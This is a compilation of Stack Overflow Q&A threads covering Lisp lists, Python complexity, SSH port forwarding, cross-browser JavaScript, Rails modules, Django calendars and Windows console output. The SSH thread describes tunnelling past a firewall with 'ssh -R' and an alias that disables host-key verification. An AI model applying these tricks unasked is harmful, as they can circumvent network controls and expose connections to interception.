(defun my-attr (list)
(nth 4 list))
(defun (setf my-attr) (new list)
(setf (nth 4 list) new))
A: +2 for "Practical Common Lisp". It is a mixture of a Common Lisp Cookbook and a quality Teach Yourself Lisp book.
There's also "Successful Common Lisp" (http://www.psg.com/~dlamkins/sl/cover.html and http://www.psg.com/~dlamkins/sl/contents.html) which seemed to fill a few gaps / extend things in "Practical Common Lisp".
I've also read Paul Graham's "ANSI Common Lisp" which is more about the basics of the language, but a bit more of a reference manual.
A: You can use setf and nth to replace and retrieve values by index.
(let ((myList '(1 2 3 4 5 6)))
(setf (nth 4 myList) 101); <----
myList)
(1 2 3 4 101 6)
To find by index you can use the position function.
(let ((myList '(1 2 3 4 5 6)))
(setf (nth 4 myList) 101)
(list myList (position 101 myList)))
((1 2 3 4 101 6) 4)
I found these all in this index of functions.
A:
*
*find the index of something in a list.
In Emacs Lisp and Common Lisp, you have the position function:
> (setq numbers (list 1 2 3 4))
(1 2 3 4)
> (position 3 numbers)
2
In Scheme, here's a tail recursive implementation from DrScheme's doc:
(define list-position
(lambda (o l)
(let loop ((i 0) (l l))
(if (null? l) #f
(if (eqv? (car l) o) i
(loop (+ i 1) (cdr l)))))))
----------------------------------------------------
> (define numbers (list 1 2 3 4))
> (list-position 3 numbers)
2
>
But if you're using a list as a collection of slots to store structured data, maybe you should have a look at defstruct or even some kind of Lisp Object System like CLOS.
If you're learning Lisp, make sure you have a look at Practical Common Lisp and / or The Little Schemer.
Cheers!
A: I have to agree with Thomas. If you use lists like arrays then that's just going to be slow (and possibly awkward). So you should either use arrays or stick with the functions you've written but move them "up" in a way so that you can easily replace the slow lists with arrays later.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45227",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "7"
} |
Q: Where can I find the time and space complexity of the built-in sequence types in Python I've been unable to find a source for this information, short of looking through the Python source code myself to determine how the objects work. Does anyone know where I could find this online?
A: If you're asking what I think you're asking, you can find them here... page 476 and on.
It's written around optimization techniques for Python; it's mostly Big-O notation of time efficiencies, not much on memory.
A: Check out the TimeComplexity page on the py dot org wiki. It covers sets/dicts/lists/etc., at least as far as time complexity goes.
A: Raymond D. Hettinger does an excellent talk (slides) about Python's built-in collections called 'Core Python Containers - Under the Hood'. The version I saw focussed mainly on set and dict, but list was covered too.
There are also some photos of the pertinent slides from EuroPython in a blog.
Here is a summary of my notes on list:
*
*Stores items as an array of pointers. Subscript costs O(1) time. Append costs amortized O(1) time. Insert costs O(n) time.
*Tries to avoid memcpy when growing by over-allocating. Many small lists will waste a lot of space, but large lists never waste more than about 12.5% on over-allocation (the snippet below makes this visible).
*Some operations pre-size. Examples given were range(n), map(), list(), [None] * n, and slicing.
*When shrinking, the array is realloced only when it is wasting 50% of space. pop is cheap.
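A quick way to watch the over-allocation mentioned above (the exact sizes are CPython- and version-specific, so treat the numbers as illustrative):
import sys

xs = []
for i in range(20):
    xs.append(i)
    # getsizeof jumps in steps rather than on every append: the
    # over-allocated spare capacity is consumed, then regrown.
    print(len(xs), sys.getsizeof(xs))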
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45228",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "19"
} |
Q: Is it possible to forward ssh requests that come in over a certain port to another machine? I have a small local network. Only one of the machines is available to the outside world (this is not easily changeable). I'd like to be able to set it up such that ssh requests that don't come in on the standard port go to another machine. Is this possible? If so, how?
Oh and all of these machines are running either Ubuntu or OS X.
A: @Mark Biek
I was going to say that, but you beat me to it! Anyways, I just wanted to add that there is also the -R option:
ssh -R 8022:myinsideserver:22 paul@myoutsideserver
The difference is what machine you are connecting to/from. My boss showed me this trick not too long ago, and it is definitely really nice to know... we were behind a firewall and needed to give external access to a machine... he got around it by ssh -R to another machine that was accessible... then connections to that machine were forwarded into the machine behind the firewall, so you need to use -R or -L based on which machine you are on and which you are ssh-ing to.
Also, I'm pretty sure you are fine to use a regular user as long as the port you are forwarding (in this case the 8022 port) is not below the restricted range (which I think is 1024, but I could be mistaken), because those are the "reserved" ports. It doesn't matter that you are forwarding it to a "restricted" port because that port is not being opened (the machine is just having traffic sent to it through the tunnel, it has no knowledge of the tunnel), the 8022 port IS being open and so is restricted as such.
EDIT: Just remember, the tunnel is only open so long as the initial ssh remains open, so if it times out or you exit it, the tunnel will be closed.
A: (In this example, I am assuming port 2222 will go to your internal host. $externalip and $internalip are the ip addresses or hostnames of the visible and internal machine, respectively.)
You have a couple of options, depending on how permanent you want the proxying to be:
*
*Some sort of TCP proxy. On Linux, the basic idea is that before the incoming packet is processed, you want to change its destination—i.e. prerouting destination NAT:
iptables -t nat -A PREROUTING -p tcp -i eth0 -d $externalip --dport 2222 --sport 1024:65535 -j DNAT --to $internalip:22
*Using SSH to establish temporary port forwarding. From here, you have two options again:
*
*Transparent proxy, where the client thinks that your visible host (on port 2222) is just a normal SSH server and doesn't realize that it is passing through. While you lose some fine-grained control, you get convenience (especially if you want to use SSH to forward VNC or X11 all the way to the inner host).
*
*From the internal machine: ssh -g -R 2222:localhost:22 $externalip
*Then from the outside world: ssh -p 2222 $externalip
Notice that the "internal" and "external" machines do not have to be on the same LAN. You can port forward all the way around the world this way.
*Forcing login to the external machine first. This is true "forwarding," not "proxying"; but the basic idea is this: You force people to log in to the external machine (so you control who can log in and when, and you get logs of the activity), and from there they can SSH through to the inside. It sounds like a chore, but if you set up simple shell scripts on the external machine with the names of your internal hosts, coupled with password-less SSH keypairs then it is very straightforward for a user to log in. So:
*
*On the external machine, you make a simple script, /usr/local/bin/internalhost which simply runs ssh $internalip
*From the outside world, users do: ssh $externalip internalhost and once they log in to the first machine, they are immediately forwarded through to the internal one.
Another advantage to this approach is that people don't get key management problems, since running two SSH services on one IP address will make the SSH client angry.
FYI, if you want to SSH to a server and you do not want to worry about keys, do this
ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no
I have an alias in my shell called "nossh", so I can just do nossh somehost and it will ignore all key errors. Just understand that you are ignoring security information when you do this, so there is a theoretical risk.
Much of this information is from a talk I gave at Barcamp Bangkok all about fancy SSH tricks. You can see my slides, but I recommend the text version as the S5 slides are kind of buggy. Check out the section called "Forward Anything: Simple Port Forwarding" for info. There is also information on creating a SOCKS5 proxy with OpenSSH. Yes, you can do that. OpenSSH is awesome like that.
(Finally, if you are doing a lot of traversing into the internal network, consider setting up a VPN. It sounds scary, but OpenVPN is quite simple and runs on all OSes. I would say it's overkill just for SSH; but once you start port-forwarding through your port-forwards to get VNC, HTTP, or other stuff happening; or if you have lots of internal hosts to worry about, it can be simpler and more maintainable.)
A: Another way to go would be to use ssh tunneling (which happens on the client side).
You'd do an ssh command like this:
ssh -L 8022:myinsideserver:22 paul@myoutsideserver
That connects you to the machine that's accessible from the outside (myoutsideserver) and creates a tunnel through that ssh connection to port 22 (the standard ssh port) on the server that's only accessible from the inside.
Then you'd do another ssh command like this (leaving the first one still connected):
ssh -p 8022 paul@localhost
That connection to port 8022 on your localhost will then get tunneled through the first ssh connection, taking you over to myinsideserver.
There may be something you have to do on myoutsideserver to allow forwarding of the ssh port. I'm double-checking that now.
Edit
Hmmm. The ssh manpage says this: **Only the superuser can forward privileged ports.**
That sort of implies to me that the first ssh connection has to be as root. Maybe somebody else can clarify that.
It looks like superuser privileges aren't required as long as the forwarded port (in this case, 8022) isn't a privileged port (like 22). Thanks for the clarification Mike Stone.
A: You can use Port Fowarding to do this. Take a look here:
http://portforward.com/help/portforwarding.htm
There are instructions on how to set up your router to port forward request on this page:
http://www.portforward.com/english/routers/port_forwarding/routerindex.htm
A: In Ubuntu, you can install Firestarter and then use its Forward Service feature to forward the SSH traffic from a non-standard port on your machine with external access to port 22 on the machine inside your network.
On OS X you can edit the /etc/nat/natd.plist file to enable port forwarding.
A: Without messing around with firewall rules, you can set up a ~/.ssh/config file.
Assume 10.1.1.1 is the 'gateway' system and 10.1.1.2 is the 'client' system.
Host gateway
Hostname 10.1.1.1
LocalForward 8022 10.1.1.2:22
Host client
Hostname localhost
Port 8022
You can open an ssh connection to 'gateway' via:
ssh gateway
In another terminal, open a connection to the client.
ssh client
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45230",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "6"
} |
Q: Strange Dependency Behavior in VS.NET 2005 (Unnecessary .CPP Compilation) I work on a large Visual C++ (MFC) project in VS.NET 2005.
I have noticed strange behavior in Visual C++ 2005. Often, I will change one line of code in a .CPP file but many .CPP files will compile as a result of this. I have never seen this until VS.NET 2005. Theoretically, changing a line of code in a .CPP file should simply require recompilation of that .CPP file and re-linking of the PE file.
What am I not understanding about the build process?
A: I found this link helpful when solving a similar problem. I was under pressure at the time; I tried a few things and the issue went away, but for the life of me I don't know (or can't remember) which - if any - helped.
Hope this helps
A: This is a strange bug in the VS2005 dependency behavior. To find out one suggestion would be to take the following steps:
*
*Go to Tools -> Options ->
Projects and Solutions -> Build and
Run -> MSBuild Project Build output
Verbosity and select Detailed
*Compile your project.
This will give you a detailed output of the build which "may" help you arrive at a solution to your problem.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45235",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "1"
} |
Q: What is the best technique for consistent form, function between all web browsers (including Google Chrome)? Short version: What is the cleanest and most maintainable technique for consistent presentation and AJAX function across all browsers used by both web developers and web developers' end-users?
*
*IE 6, 7, 8
*Firefox 2, 3
*Safari
*Google Chrome
*Opera
Long version: I wrote a web app aimed at other web developers. I want my app to support the major web browsers (plus Google Chrome) in both presentation and AJAX behavior.
I began on Firefox/Firebug, then added conditional comments for a consistent styling under IE 6 and 7. Next, to my amazement, I discovered that jQuery does not behave identically in IE; so I changed my Javascript to be portable on FF and IE using conditionals and less pure jQuery.
Today, I started testing on Webkit and Google Chrome and discovered that, not only are the styles inconsistent with both FF and IE, but Javascript is not executing at all, probably due to a syntax or parse error. I expected some CSS work, but now I have more Javascript debugging to do! At this point, I want to step back and think before writing piles of special cases for all situations.
I am not looking for a silver bullet, just best practices to keep things as understandable and maintainable as possible. I prefer if this works with no server-side intelligence; however if there is an advantage to, for example, checking the user-agent and then returning different files to different browsers, that is fine if the total comprehensibility and maintainability of the web app is lower. Thank you all very much!
A: Chrome is actually a little different from Safari: it uses a completely different javascript implementation, and problems have been reported with both prototype and jquery. I wouldn't worry about it too much for now; it's still an early beta version of the browser, and such inconsistencies will probably be treated as bugs. Here's the bug report.
A: One "silver bullet" you may consider turning to is Google Web Toolkit (GWT).
I believe it supports all the browsers you are interested in, and gives you the ability to code your UI in a Java-compatible IDE such as Eclipse. The advantage of this is you can use IDE tools for code completion and compile-time error checking, which greatly improves development on large-scale UI projects.
If you use GWT UI components, it will hide a lot of browser-specific nastiness from having to be dealt with, but when you compile, it will create a compact deploy file for each browser platform. This way you never download any IE-specific code if you are viewing the app in Firefox. You will also have a client-side stub generated which will load the appropriate compiled bundle of JS. To sweeten the deal, these files are cacheable, so perceived performance is generally improved for returning visitors.
A: The landscape has evolved considerably to accommodate cross-browser development. jQuery, Prototype and other frameworks exist for cross-browser Javascript. CSS resets are good for starting on a common blank canvas for all browsers. BluePrint and 960 are both CSS frameworks to help with layouts using CSS grid layouts techniques that seems to be getting very popular these days.
As for other CSS quirks across the different browsers, there is no holy grail here and the only option is to test your website across different browsers and use this awesome resource and definitely join a mailing list to save some time.
If you are working on a high-volume production site then you can use a service like browsercam.com in the end game to ensure the site doesn't break horribly in some browser.
Lastly, don't try to make the site look the same in every browser. Your primary design should target IE/FF and you should be okay with reasonable compromises on others. Use the graded browser chart to narrow in on browser support.
As for best practices, start using wireframes on blank paper or a service like Balsamiq Mockups. I am still surprised how many developers start with an editor instead of a wireframe, but then again I only switched a year back before realizing how big a time saver it is. Have clean separation of layout (HTML), presentation (CSS) and behaviors (Javascript). There should be no styling elements in HTML, no presentation in Javascript (use .addClass('highlight') instead of .css({'background-color': 'red'});).
If you are not familiar with any of the bold terms in this post, Googling them should be fruitful for your web development career and productivity.
A: If you're starting from a base reset or framework and have accounted for IE and it's still all freaky, you may want to recheck the following:
*
*Everything validates? CSS and HTML?
*Any broken links to an included file (js, css, etc?). In Chrome/Safari, if your stylesheet link is busted, all of your links might end up red. (something to do with the default 404 styling I think)
*Any odd requirements of your js plugins that you might be using? (does the css file have to come before the js file, like with jquery.thickbox?)
A: For UI, check out Ext.
It's great as a standalone library, though it can also be used with jQuery, YUI, Prototype and GWT.
Samples: http://extjs.com/deploy/dev/examples/samples.html
A: I've found four things helpful in developing JavaScript applications:
*
*Feature detection
*Libraries
*Iterative Development using Virtualization
*JavaScript: The Definitive Guide, Douglas Crockford & John Resig
Feature Detection
Use reflection to ask if the browser supports the desired feature. If you want to know what event handling a browser supports, you can test if(el.addEventListener) for W3C compliance, if(el.attachEvent) for the IE-type, and finally fall back on el['onsomeevent'].
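For example, a cross-browser event helper built on feature detection might look like:
function addEvent(el, type, fn) {
    if (el.addEventListener) {           // W3C event model
        el.addEventListener(type, fn, false);
    } else if (el.attachEvent) {         // older IE
        el.attachEvent('on' + type, fn);
    } else {                             // last-resort fallback
        el['on' + type] = fn;
    }
}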
ONE BIG BUT!
Browsers sometimes lie about what features they support. I can't remember the details, but I ran into an issue where Firefox implemented a DOM feature, but would return false if you tested for that feature!
Libraries
Since you're already working with jQuery, I'll save the explanation. But if you're running into problems you may want to consider YUI for its wonderful cross-browser compatibility. They even work together.
Iterative Development with Virtualization
Perhaps my best advice: Run all your test environment's at once. Get a Linux distro, Compiz Fusion and a bunch of RAM. Download a copy of either VMWare's VMWare Server or Sun's Virtual Box and install a few operating systems. Get images for Windows XP, Windows Vista and Mac OS X.
The basic idea is this: Compiz Fusion gives you 4 Desktops mapped onto a Cube. 1 of these desktops is your Linux computer, the next your virtual Windows XP box, the one after that Vista, the last Mac OS X. After writing some code, you alt-tab into a virtual computer and check out your work. Plus it looks awesome.
JavaScript: The Definitive Guide, Douglas Crockford & John Resig
These three sources provide most of my information for JavaScript development. The Definitive guide is perhaps the best reference book for JavaScript.
Douglas Crockford is a JavaScript guru (I hate the word) at Yahoo. Look up his series "Douglas Crockford Theory of the DOM", "Douglas Crockford Advanced JavaScript", and "Douglas Crockford The Good Parts" on Yahoo! Videos.
John Resig (as you know) wrote jQuery. His website at ejohn.org contains a wealth of JavaScript information, and if you dig around on Google you'll find he's given a number of presentations on defensive JavaScript techniques.
... Good luck!
A: I am in a similar situation, working on a web app that is targeted at IT professionals, and required to support the same set of browsers, minus Opera.
Some general things I've learned so far:
*
*Test often, in as many of your target browsers as you can. Make sure you have time for this in your development schedule.
*Toolkits can get you part of the way to cross-browser support, but will eventually miss something on some browser. Plan some time for debugging and researching fixes for specific browsers.
*If you need something that's not in a toolkit and can't find a free code snippet, invest some time to write utility functions that encapsulate the browser-dependent behavior.
*Educate yourself about known browser bugs, so that you can steer your implementation around them.
A few more-specific things I've learned:
*
*Use conditional code based on the user-agent only as a last resort, because different generations of the "same" browser may have different features. Instead, test for standards-compliant behavior first — e.g., if(node.addEventListener)..., then common non-standard functions — e.g., if(window.attachEvent)..., and then, if you must, look at the user-agent for a specific browser type & version number.
*Knowing when the DOM is 'ready' for script access is different in just about every browser. A good toolkit will abstract this for you.
*Event handlers are different in just about every browser. A good toolkit will abstract this for you.
*Creating DOM elements, particularly form controls or elements with attributes, can be tricky with document.createElement and element.setAttribute. While not standard (and kinda yucky), using node.innerHTML with strings that contain bits of HTML seems to be more reliable across browser types. I have yet to find a toolkit that will let you use element.setAttribute to add a 'name' to a form element in IE.
*CSS differences (and bugs) are just as important as JS differences.
*The 'core' Javascript features (String, Date, RegExp, Array functions) seem to be pretty reliable and consistent across browsers, especially relative to the DOM/CSS/Window functions. There's some small joy in the fact that the language isn't entirely different on every platform. :-)
I haven't really run into any Chrome-specific JS bugs, but it's always one of the first browsers I test.
HTH
A: Just so you've got one less browser to worry about, Chrome uses the same rendering engine as Safari. So if it works in Safari, it should work exactly the same in Chrome.
See this post on Matt Cutts' blog.
Google Chrome uses WebKit for rendering, which is the same rendering engine as Apple’s Safari browser, so if your site is compatible with Safari it should work great in Chrome.
Update: Looks like this is now out-dated info. Please see Vox's comment on this answer.
A: If your very top priority is exactly consistent presentation on all the browsers listed with no disparities, you should probably be looking at AS3 and Flex.
A: Personally, I use Mootools as a simple lightweight javascript framework. It is simple to use and supports all the browsers above (except Chrome, but that seems to work too as far as I can tell).
Also, to ensure consistency across the browsers, I get a feature/style/behaviour/etc. to work in one browser first (usually Firefox 3 with firebug), then immediately check to make sure it works in all the other browsers (leaving IE6 for last). If it doesn't, I invest the time to fix it right away, because otherwise I know I won't have time later (in my experience, getting things to work cross-browser takes about 50% of my dev. time ;-) )
A: Validating your JavaScript with the "Good Parts" and browser options on JSLint.com makes it less likely to have your JavaScript behaving differently in FF, Safari, etc.
Otherwise - using standards and validating your code as well as building on existing techniques like jQuery should make your site behave the same in all browsers except IE - and there's no magic recipe for IE - it's just bugs everywhere...
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45239",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "10"
} |
Q: Load Balancing of Process in 1 Server I have 1 process that receives incoming connections on port 1000 on one Linux server. However, 1 process is not fast enough to handle all the incoming requests.
I want to run multiple processes in the server but with 1 end-point. In this way, the client will only see 1 end-point/process not multiple.
I have checked LVS and other Load Balancing Solution. Those solutions seem geared towards multiple servers load-balancing.
Any other solution to help on my case?
I am looking for something more like nginx, where I will need to run multiple copies of my app.
Let me try it out.
Thanks for the help.
A: The question is a little unclear to me, but I suspect the answer you are looking for is to have a single process accepting tasks from the network, and then forking off 'worker processes' to actually perform the work (before returning the result to the user).
In that way, the work which is being done does not block the acceptance of more requests.
As you point out, the term load balancing carries the implication of multiple servers - what you want to look for is information about how to write a linux network daemon.
The two key system calls you'll want to look at are called fork and exec.
A: It sounds like you just need to integrate your server with xinetd.
This is a server that listens on predefined ports (that you control through config) and forks off processes to handle the actual communication on that port.
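A hypothetical /etc/xinetd.d/myapp entry would look something like this (the service name, port and server path are placeholders for your setup):
service myapp
{
    # UNLISTED: the port is declared here instead of /etc/services
    type        = UNLISTED
    port        = 1000
    socket_type = stream
    protocol    = tcp
    # wait = no makes xinetd fork a new server process per connection
    wait        = no
    user        = nobody
    server      = /usr/local/bin/myapp
}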
A: You also may want to go with a web server like nginx. It can load balance your app against multiple ports of the same app, and is commonly used to load balance Ruby on Rails apps (which are single threaded). The downside is that you need to run multiple copies of your app (one on each port) for this load balancing to work.
A: You need multi-processing or multi-threading. You aren't specific on the details of the server, so I can't give you advice on what to do exactly. fork and exec as Matt suggested can be a solution, but really: what kind of protocol/server are we talking about?
A: I am thinking of running multiple applications, similar to ypops.
A: nginx is great but if you don't fancy a whole new web server, apache 2.2 with mod proxy balancer will do the same job
A: Perhaps you can modify your client to round-robin ports (say) 1000-1009 and run 10 copies of the process?
Alternatively there must be some way of internally refactoring it.
It's possible for several processes to listen to the same socket at once by having it opened before calling fork(), but (if it's a TCP socket) once accept() is called the resulting socket then belongs to whichever process successfully accepted the connection.
So essentially you could use:
*
*Prefork, where you open the socket, fork a specified number of children which then share the load (see the sketch after this list)
*Post-fork, where you have one master process which accepts all the connections and forks children to handle individual sockets
*Threads - you can share the sockets in whatever way you like with those, as the file descriptors are not cloned, they're just available to any thread.
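For illustration, here's a minimal pre-fork sketch in C; error handling and worker supervision are omitted:
#include <arpa/inet.h>
#include <netinet/in.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

int main(void)
{
    struct sockaddr_in addr;
    int i, listener = socket(AF_INET, SOCK_STREAM, 0);

    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = htonl(INADDR_ANY);
    addr.sin_port = htons(1000);
    bind(listener, (struct sockaddr *)&addr, sizeof(addr));
    listen(listener, 128);

    /* The socket exists before fork(), so all children share it. */
    for (i = 0; i < 4; i++) {
        if (fork() == 0) {
            for (;;) {
                int conn = accept(listener, NULL, NULL);
                /* ... read the request, write the reply ... */
                close(conn);
            }
        }
    }
    for (;;)
        pause(); /* parent just keeps the children alive */
}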
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45252",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "1"
} |
Q: Adding functionality to Rails I'm working on a Rails app and am looking to include some functionality from "Getting the Hostname or IP in Ruby on Rails" that I asked.
I'm having problems getting it to work. I was under the impression that I should just make a file in the lib directory, so I named it 'get_ip.rb', with the contents:
require 'socket'
module GetIP
def local_ip
orig, Socket.do_not_reverse_lookup = Socket.do_not_reverse_lookup, true # turn off reverse DNS resolution temporarily
UDPSocket.open do |s|
s.connect '64.233.187.99', 1
s.addr.last
end
ensure
Socket.do_not_reverse_lookup = orig
end
end
I had also tried defining GetIP as a class but when I do the usual ruby script/console, I'm not able to use the local_ip method at all. Any ideas?
A: require will load a file. If that file contains any class/module definitions, then your other code will now be able to use them. If the file just contains code which is not in any modules, it will get run as if it were in the same place as your 'require' call (like PHP include)
include is to do with modules.
It takes all the methods in the module, and adds them to your class. Like this:
class Orig
end
Orig.new.first_method # no such method
module MyModule
def first_method
end
end
class Orig
include MyModule
end
Orig.new.first_method # will now run first_method as it's been added.
Note above how, when I wanted to access first_method, I created a new object of the Orig class. That's what I mean by an instance method.
There's also extend, which works like include does, but instead of adding the methods as instance methods, adds them as class methods, like this:
class SecondClass
extend MyModule
end
SecondClass.first_method # will call first_method
Note that in this example I'm not making any new objects, just calling the method directly on the class, as if it had been defined as self.first_method all along.
So there you go :-)
A: You haven't described how you're trying to use the method, so I apologize in advance if this is stuff you already know.
The methods on a module never come into use unless the module is included into a class. Instance methods on a class require there to be an instance of the class. You probably want a class method instead. And the file itself should be loaded, generally through the require statement.
If the following code is in the file getip.rb,
require 'socket'
class GetIP
def self.local_ip
orig, Socket.do_not_reverse_lookup = Socket.do_not_reverse_lookup, true
UDPSocket.open do |s|
s.connect '64.233.187.99', 1
s.addr.last
end
ensure
Socket.do_not_reverse_lookup = orig
end
end
Then you should be able to run it by saying,
require 'getip'
GetIP.local_ip
A: require and include are two different things.
require is to strictly load a file once from a load path. The loadpath is a string and this is the key used to determine if the file has already been loaded.
include is used to "mix-in" modules into other classes. include is called on a module and the module methods are included as instance methods on the class.
module MixInMethods
def mixed_in_method
"I'm a part of #{self.class}"
end
end
class SampleClass
include MixInMethods
end
my_class = SampleClass.new
puts my_class.mixed_in_method # >> I'm a part of SampleClass
But many times the module you want to mix in is not in the same file as the target class. So you do a require 'module_file_name' and then inside the class you do an include module.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45253",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "2"
} |
Q: Django Calendar Widget? Does anyone know of any existing packages or libraries that can be used to build a calendar in a django app?
A: It seems that django-calendar has become django-agenda: http://github.com/dokterbob/django-agenda
A: Great tips!
django-swingtime lives on
http://github.com/dakrauth/django-swingtime
A: The django-schedule code originally from thauber (thauber/django-schedule) has been forked and worked into the glamkit/glamkit-eventtools code for Galleries, Libraries, Museums and Archives. It has also been forked and updated by a variety of other folks, e.g. boskee/django-schedule, and my guess is that that might have fewer dependencies and be easier to integrate into another project. It says:
Django-schedule: A calendaring/scheduling application, featuring:
*
*one-time and recurring events
*calendar exceptions (occurrences changed or cancelled)
*occurrences accessible through Event API and Period API
*relations of events to generic objects
*ready to use, nice user interface
*view day, week, month, three months and year
*project sample which can be launched immediately and reused in your project
See the github "network" tab for a graphical navigation from the point of view of a given branch to see how other branches relate to it (i.e. what is available for merging).
A: A quick google search reveals django-gencal, which looks like exactly what you need. It would also be worth looking at the snippets under the calendar tag on Django Snippets at http://www.djangosnippets.org/tags/calendar/.
A: svn checkout http://django-calendar.googlecode.com/svn/trunk/ django-calendar-read-only
svn: URL 'http://django-calendar.googlecode.com/svn/trunk' doesn't exist
so a Google search may still turn it up, but it no longer exists.
A: There is another calendar alternative here, Django Event Calendar from 3captus, that offers something a bit simpler. I'm trying it out now, but it looks like a better fit for me.
From the features list:
*
*Full-featured calendar display using the Python calendar class
*Support month scrolling (forward or backward)
*AJAX add, modify, delete GUI
*Requires minimal knowledge of Django; should be a good complement after you are done with the Django tutorial
(http://www.djangoproject.com/documentation/tutorial01/)
*Calendar and Event class can be used in any python project
*Full unit test included
A: There are also some calendar functions built into Python itself, you can see a simple implementation here.
A: Today I ran into django-swingtime. Worth checking out.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45264",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "34"
} |
Q: How do I make AutoCompleteExtender render above select controls in IE6 When an AutoCompleteExtender is displayed in IE6 it seems to ignore z-index and renders below any select controls (like dropdownlists) in IE6.
<asp:TextBox ID="TextBox1" runat="server" />
<cc1:AutoCompleteExtender ID="AutoCompleteExtender1" runat="server"
TargetControlID="TextBox1" EnableCaching="true" CompletionSetCount="5"
FirstRowSelected="true" ServicePath="~/Services/Service1.asmx" ServiceMethod="GetSuggestion" />
<asp:DropDownList ID="DropDownList1" runat="server">
<asp:ListItem Text="Item 1" Value="0" />
<asp:ListItem Text="Item 2" Value="1" />
</asp:DropDownList>
How do I make it render above dropdownlists?
A: Nothing renders above select controls in IE6. It's one of the many "features" Microsoft bestowed upon us when they gifted IE to the world.
You have to hide them, then re-show them.
Observe the standard lightbox script - which does exactly this
(note that link is just to the first thing I found on google which had the source to lightbox.js as a demonstration. It's got nothing to do with anything else)
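For reference, the hide/re-show trick boils down to something like this (the function name is mine):
function toggleSelects(show) {
    var selects = document.getElementsByTagName('select');
    for (var i = 0; i < selects.length; i++) {
        selects[i].style.visibility = show ? 'visible' : 'hidden';
    }
}

// call toggleSelects(false) before showing the popup,
// and toggleSelects(true) after hiding it again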
A: @Orion has this partially correct - there is one other way to deal with these, and that is to cover the offending select lists with an iframe. This technique is used in Cody Lindley's ThickBox (written for jQuery). See the code for details on how to do it.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45267",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "0"
} |
Q: How do I implement an OpenID server in Rails? I see a similar question for Ubuntu, but I'm interested in hosting my own OpenID provider through my Rails-based site that already has an identity and authentication system in place.
Note that I'm not looking for the delegate method to use the site as an OpenID.
What's the best way to do this properly?
A: This "No Shit Guide To Supporting OpenID In Your Applications"
seems to be a step-by-step tutorial for what you want to do.
A: Railscasts episode 68, OpenID authentication, describes how to do exactly this. It's about a year old, so you may have to do some stuff differently. I'd also strongly push for either an updated or newer OpenID plugin (the link for the one in the video is labeled "outdated").
Err, wait, that is to support OpenID authentication in a Rails application you are writing, not to run an OpenID endpoint in Rails. Here is a guide to implementing an OpenID server/endpoint in Rails pretty much from scratch. gem install openid-server might be easier, but you'll learn more implementing it yourself, and the code is pretty simple.
A: This reminds me that the overview docs for ruby-openid server are still missing. But you can see the example, and until the docs are ported over, see the docs for the python implementation which follows the same object model.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45277",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "6"
} |
Q: How can I overwrite the same portion of the console in a Windows native C++ console app, without using a 3rd Party library? I have a console app that needs to display the state of items, but rather than having text scroll by like mad I'd rather see the current status keep showing up on the same lines. For the sake of example:
Running... nn% complete
Buffer size: bbbb bytes
should be the output, where 'nn' is the current percentage complete, and 'bbbb' is a buffer size, updated periodically on the same lines of the console.
The first approach I took simply printed the correct number of backspaces to the console before printing the new state, but this has an obnoxious flicker that I want to get rid of. I also want to stick to either standard library or MS-provided functionality (VC 8) so as not to introduce another dependency for this one simple need.
A: You can use SetConsoleCursorPosition. You'll need to call GetStdHandle to get a handle to the output buffer.
A: Joseph, JP, and CodingTheWheel all provided valuable help.
For my simple case, the most straight-forward approach seemed to be based on CodingTheWheel's answer:
// before entering update loop
HANDLE h = GetStdHandle(STD_OUTPUT_HANDLE);
CONSOLE_SCREEN_BUFFER_INFO bufferInfo;
GetConsoleScreenBufferInfo(h, &bufferInfo);
// update loop
while (updating)
{
// reset the cursor position to where it was each time
SetConsoleCursorPosition(h, bufferInfo.dwCursorPosition);
//...
// insert combinations of sprintf, printf, etc. here
//...
}
For more complicated problems, the full console API as provided by JP's answer, in coordination with the examples provided via the link from Joseph's answer may prove useful, but I found the work necessary to use CHAR_INFO too tedious for such a simple app.
A: If you print using \r and don't use a function that will generate a newline or add \n to the end, the cursor will go back to the beginning of the line and just print over the next thing you put up. Generating the complete string before printing might reduce flicker as well.
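For the single-line case, that looks something like this (a sketch; Sleep stands in for real work):
#include <cstdio>
#include <windows.h>

int main()
{
    for (int percent = 0; percent <= 100; ++percent)
    {
        // \r returns to the start of the line without a newline,
        // so each iteration overwrites the previous status text
        std::printf("\rRunning... %3d%% complete", percent);
        std::fflush(stdout);
        Sleep(50);
    }
    std::printf("\n");
    return 0;
}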
UPDATE: The question has been changed to 2 lines of output instead of 1 which makes my answer no longer complete. A more complicated approach is likely necessary. JP has the right idea with the Console API. I believe the following site details many of the things you will need to accomplish your goal. The site also mentions that the key to reducing flicker is to render everything offscreen before displaying it. This is true whenever you are displaying anything on the screen whether it is text or graphics (2D or 3D).
http://www.benryves.com/tutorials/?t=winconsole
A: In case the Joseph's suggestion does not give you enough flexibility, have a look at the Console API: http://msdn.microsoft.com/en-us/library/ms682073(VS.85).aspx.
A: In Linux, you can accomplish this by printing \b and/or \r to stderr. You might need to experiment to find the right combination of things in Windows.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45286",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "15"
} |
